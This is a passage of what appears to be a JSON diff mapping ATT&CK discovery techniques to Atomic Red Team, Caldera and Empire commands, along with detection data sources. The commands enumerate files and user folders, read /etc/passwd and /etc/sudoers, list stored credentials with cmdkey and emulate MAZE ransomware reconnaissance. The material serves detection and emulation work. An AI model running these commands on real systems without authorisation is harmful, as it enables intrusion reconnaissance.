It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information 
about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1083", + "command_list": [ + "dir /s c:\\ >> %temp%\\download\ndir /s \"c:\\Documents and Settings\" >> %temp%\\download\ndir /s \"c:\\Program Files\\\" >> %temp%\\download\ndir \"%systemdrive%\\Users\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\Desktop\\*.*\" >> %temp%\\download\ntree /F >> %temp%\\download\n", + "ls -recurse\nget-childitem -recurse\ngci -recurse\n", + "ls -a >> /tmp/T1083.txt\nif [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > /tmp/T1083.txt; fi;\nfile */* *>> /tmp/T1083.txt\ncat /tmp/T1083.txt 2>/dev/null\nfind . -type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", + "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt\nif [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi;\nfind . -type f -iname *.pdf >> /tmp/T1083.txt\ncat /tmp/T1083.txt\nfind . 
-type f -name \".*\"\n", + "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt}\n}\ncat $env:temp\\T1083Test5.txt\n", + "Get-ChildItem -Path #{host.system.path}\n", + "ls\n", + "dir\n", + "pwd\n", + "find ~ -type f -name #{host.print.file} 2>/dev/null", + "powershell/collection/file_finder", + "powershell/collection/find_interesting_file", + "powershell/collection/get_indexed_item", + "powershell/situational_awareness/network/powerview/get_fileserver" + ], + "commands": [ + { + "command": "dir /s c:\\ >> %temp%\\download\ndir /s \"c:\\Documents and Settings\" >> %temp%\\download\ndir /s \"c:\\Program Files\\\" >> %temp%\\download\ndir \"%systemdrive%\\Users\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\Desktop\\*.*\" >> %temp%\\download\ntree /F >> %temp%\\download\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "ls -recurse\nget-childitem -recurse\ngci -recurse\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "ls -a >> /tmp/T1083.txt\nif [ -d /Library/Preferences/ ]; then ls -la 
/Library/Preferences/ > /tmp/T1083.txt; fi;\nfile */* *>> /tmp/T1083.txt\ncat /tmp/T1083.txt 2>/dev/null\nfind . -type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/T1083.txt\nif [ -f /etc/mtab ]; then cat /etc/mtab >> /tmp/T1083.txt; fi;\nfind . -type f -iname *.pdf >> /tmp/T1083.txt\ncat /tmp/T1083.txt\nfind . -type f -name \".*\"\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append $env:temp\\T1083Test5.txt\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append $env:temp\\T1083Test5.txt}\n}\ncat $env:temp\\T1083Test5.txt\n", + "source": "atomics/T1083/T1083.yaml", + "name": "Atomic Red Team Test - File and Directory Discovery" + }, + { + "command": "Get-ChildItem -Path #{host.system.path}\n", + "source": "data/abilities/discovery/1c353eb4-29ab-4dfe-88ed-f34f5a60848e.yml", + "name": "Find or discover files on the file system" + }, + { + "command": "ls\n", + "source": "data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml", + "name": "List contents of 
current directory" + }, + { + "command": "dir\n", + "source": "data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml", + "name": "List contents of current directory" + }, + { + "command": "pwd\n", + "source": "data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml", + "name": "Print the current working directory on the system" + }, + { + "command": "find ~ -type f -name #{host.print.file} 2>/dev/null", + "source": "data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml", + "name": "Locate file that appears in the printer queue" + }, + { + "command": "powershell/collection/file_finder", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/find_interesting_file", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/get_indexed_item", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_fileserver", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1083", + "display_name": "File and Directory Discovery", + "atomic_tests": [ + { + "name": "File and Directory Discovery (cmd.exe)", + "auto_generated_guid": "0e36303b-6762-4500-b003-127743b80ba6", + "description": "Find or discover files on the file system. 
Upon execution, the file \"download\" will be placed in the temporary folder and contain the output of\nall of the data discovery commands.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "dir /s c:\\ >> %temp%\\download\ndir /s \"c:\\Documents and Settings\" >> %temp%\\download\ndir /s \"c:\\Program Files\\\" >> %temp%\\download\ndir \"%systemdrive%\\Users\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*.*\" >> %temp%\\download\ndir \"%userprofile%\\Desktop\\*.*\" >> %temp%\\download\ntree /F >> %temp%\\download\n", + "name": "command_prompt" + } + }, + { + "name": "File and Directory Discovery (PowerShell)", + "auto_generated_guid": "2158908e-b7ef-4c21-8a83-3ce4dd05a924", + "description": "Find or discover files on the file system. Upon execution, file and folder information will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "ls -recurse\nget-childitem -recurse\ngci -recurse\n", + "name": "powershell" + } + }, + { + "name": "Nix File and Directory Discovery", + "auto_generated_guid": "ffc8b249-372a-4b74-adcd-e4c0430842de", + "description": "Find or discover files on the file system\n\nReferences:\n\nhttp://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/\n\nhttps://perishablepress.com/list-files-folders-recursively-terminal/\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file used to store the results.", + "type": "Path", + "default": "/tmp/T1083.txt" + } + }, + "executor": { + "command": "ls -a >> #{output_file}\nif [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi;\nfile */* *>> #{output_file}\ncat #{output_file} 2>/dev/null\nfind . 
-type f\nls -R | grep \":$\" | sed -e 's/:$//' -e 's/[^-][^\\/]*\\//--/g' -e 's/^/ /' -e 's/-/|/'\nlocate *\nwhich sh\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Nix File and Directory Discovery 2", + "auto_generated_guid": "13c5e1ae-605b-46c4-a79f-db28c77ff24e", + "description": "Find or discover files on the file system\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file used to store the results.", + "type": "Path", + "default": "/tmp/T1083.txt" + } + }, + "executor": { + "command": "cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file}\nif [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi;\nfind . -type f -iname *.pdf >> #{output_file}\ncat #{output_file}\nfind . -type f -name \".*\"\n", + "cleanup_command": "rm #{output_file}", + "name": "sh" + } + }, + { + "name": "Simulating MAZE Directory Enumeration", + "auto_generated_guid": "c6c34f61-1c3e-40fb-8a58-d017d88286d8", + "description": "This test emulates MAZE ransomware's ability to enumerate directories using Powershell. \nUpon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. 
\nSee https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "File_to_output": { + "description": "File to output results to", + "type": "String", + "default": "$env:temp\\T1083Test5.txt" + } + }, + "executor": { + "command": "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}\nGet-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}\nGet-ChildItem -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File -append #{File_to_output}\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n", + "cleanup_command": "remove-item #{File_to_output} -ErrorAction SilentlyContinue\n", + "name": "powershell" + } + } + ] + }, + { + "id": "1c353eb4-29ab-4dfe-88ed-f34f5a60848e", + "name": "File and Directory Discovery", + "description": "Find or discover files on the file system", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-ChildItem -Path #{host.system.path}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.system.path" + } + ] + } + ] + }, + { + "id": "52177cc1-b9ab-4411-ac21-2eadc4b5d3b8", + "name": "List Directory", + "description": "List contents of current directory", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and 
Directory Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ls\n" + } + }, + "linux": { + "sh": { + "command": "ls\n" + } + }, + "windows": { + "psh": { + "command": "dir\n" + } + } + } + }, + { + "id": "6e1a53c0-7352-4899-be35-fa7f364d5722", + "name": "Print Working Directory", + "description": "Print the current working directory on the system", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "pwd\n" + } + }, + "linux": { + "sh": { + "command": "pwd\n" + } + }, + "windows": { + "psh": { + "command": "pwd\n" + } + } + } + }, + { + "id": "a41c2324-8c63-4b15-b3c5-84f920d1f226", + "name": "Locate file from printer queue", + "description": "Locate file that appears in the printer queue", + "tactic": "discovery", + "technique": { + "attack_id": "T1083", + "name": "File and Directory Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "find ~ -type f -name #{host.print.file} 2>/dev/null", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.system.path" + } + ] + } + } + }, + "darwin": { + "sh": { + "command": "find ~ -type f -name #{host.print.file} 2>/dev/null", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.system.path" + } + ] + } + } + } + } + }, + { + "Empire Module": "powershell/collection/file_finder", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/collection/file_finder\": [\"T1083\"]," + }, + { + "Empire Module": "powershell/collection/find_interesting_file", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/collection/find_interesting_file\": [\"T1083\"]," + }, + { + "Empire Module": 
"powershell/collection/get_indexed_item", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/collection/get_indexed_item\": [\"T1083\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_fileserver", + "ATT&CK Technique #1": "T1083", + "ATT&CK Technique #2": "T1135", + "Technique": "File and Directory Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_fileserver\": [\"T1083\",\"T1135\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": 
[ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + 
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1087.001", + "command_list": [ + "cat /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "sudo cat /etc/sudoers > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", + "username=$(id -u -n) && lsof -u $username\n", + "lastlog > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "groups\nid\n", + "dscl . list /Groups\ndscl . list /Users\ndscl . list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", + "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", + "net user\nget-localuser\nget-localgroupmember -group Users\ncmdkey.exe /list\nls C:/Users\nget-childitem C:\\Users\\\ndir C:\\Users\\\nget-localgroup\nnet localgroup\n", + "query user\n", + "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "dscl . 
list /Users | grep -v '_'\n", + "Get-WmiObject -Class Win32_UserAccount\n" + ], + "commands": [ + { + "command": "cat /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "sudo cat /etc/sudoers > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "grep 'x:0:' /etc/passwd > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt 2>/dev/null\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "username=$(id -u -n) && lsof -u $username\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "lastlog > /tmp/T1087.001.txt\ncat /tmp/T1087.001.txt\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "groups\nid\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "dscl . list /Groups\ndscl . list /Users\ndscl . 
list /Users | grep -v '_'\ndscacheutil -q group\ndscacheutil -q user\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "net user\ndir c:\\Users\\\ncmdkey.exe /list\nnet localgroup \"Users\"\nnet localgroup\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "net user\nget-localuser\nget-localgroupmember -group Users\ncmdkey.exe /list\nls C:/Users\nget-childitem C:\\Users\\\ndir C:\\Users\\\nget-localgroup\nnet localgroup\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "query user\n", + "source": "atomics/T1087.001/T1087.001.yaml", + "name": "Atomic Red Team Test - Account Discovery: Local Account" + }, + { + "command": "cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#'\n", + "source": "data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml", + "name": "Get a list of all local users" + }, + { + "command": "dscl . 
list /Users | grep -v '_'\n", + "source": "data/abilities/discovery/feaced8f-f43f-452a-9500-a5219488abb8.yml", + "name": "Identify all local users" + }, + { + "command": "Get-WmiObject -Class Win32_UserAccount\n", + "source": "data/abilities/discovery/feaced8f-f43f-452a-9500-a5219488abb8.yml", + "name": "Identify all local users" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1087.001", + "display_name": "Account Discovery: Local Account", + "atomic_tests": [ + { + "name": "Enumerate all accounts (Local)", + "auto_generated_guid": "f8aab3dd-5990-4bf8-b8ab-2226c951696f", + "description": "Enumerate all accounts by copying /etc/passwd to another file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": "cat /etc/passwd > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, + { + "name": "View sudoers access", + "auto_generated_guid": "fed9be70-0186-4bde-9f8a-20945f9370c2", + "description": "(requires root)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": "sudo cat /etc/sudoers > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "View accounts with UID 0", + "auto_generated_guid": "c955a599-3653-4fe5-b631-f11c00eb0397", + "description": "View accounts with UID 0\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "executor": { + "command": 
"grep 'x:0:' /etc/passwd > #{output_file}\ncat #{output_file} 2>/dev/null\n", + "cleanup_command": "rm -f #{output_file} 2>/dev/null\n", + "name": "sh" + } + }, + { + "name": "List opened files by user", + "auto_generated_guid": "7e46c7a5-0142-45be-a858-1a3ecb4fd3cb", + "description": "List opened files by user\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "username=$(id -u -n) && lsof -u $username\n", + "name": "sh" + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "check if lsof exists\n", + "prereq_command": "which lsof\n", + "get_prereq_command": "(which yum && yum -y install lsof)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y lsof)\n" + } + ] + }, + { + "name": "Show if a user account has ever logged in remotely", + "auto_generated_guid": "0f0b6a29-08c3-44ad-a30b-47fd996b2110", + "description": "Show if a user account has ever logged in remotely\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1087.001.txt" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if lastlog command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v lastlog)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo apt-get install login; exit 1;\n" + } + ], + "executor": { + "command": "lastlog > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Enumerate users and groups", + "auto_generated_guid": "e6f36545-dc1e-47f0-9f48-7f730f54a02e", + "description": "Utilize groups and id to enumerate users and groups\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "groups\nid\n", + "name": "sh" + } + }, + { + "name": "Enumerate users and groups", + "auto_generated_guid": 
